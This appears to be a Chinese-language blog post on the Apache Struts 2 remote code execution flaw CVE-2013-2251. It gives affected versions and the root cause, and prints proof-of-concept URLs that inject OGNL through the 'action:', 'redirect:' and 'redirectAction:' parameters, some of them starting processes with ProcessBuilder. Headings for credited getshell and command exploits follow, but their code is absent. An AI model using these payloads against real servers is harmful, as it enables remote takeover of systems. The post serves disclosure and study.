Struts又爆遠程代碼執(zhí)行漏洞了!在這次的漏洞中，攻擊者可以通過操縱參數(shù)遠程執(zhí)行惡意代碼。Struts 2.3.15.1之前的版本，參數(shù)action的值redirect以及redirectAction沒有正確過濾，導(dǎo)致ognl代碼執(zhí)行。

描述

影響版本 Struts 2.0.0 - Struts 2.3.15

報告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE編號 CVE-2013-2251

漏洞證明

參數(shù)會以O(shè)GNL表達式執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代碼執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{(new+
java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

以下僅供教學(xué)研究之用，嚴禁非法用途!

執(zhí)行任意命令EXP，感謝X提供：

爆網(wǎng)站路徑EXP，感謝h4ck0r提供：

python執(zhí)行任意命令，感謝h4ck0r提供

GETSHELL EXP，感謝coffee提供：

然后用以下代碼寫shell:

上前目錄生成1.jsp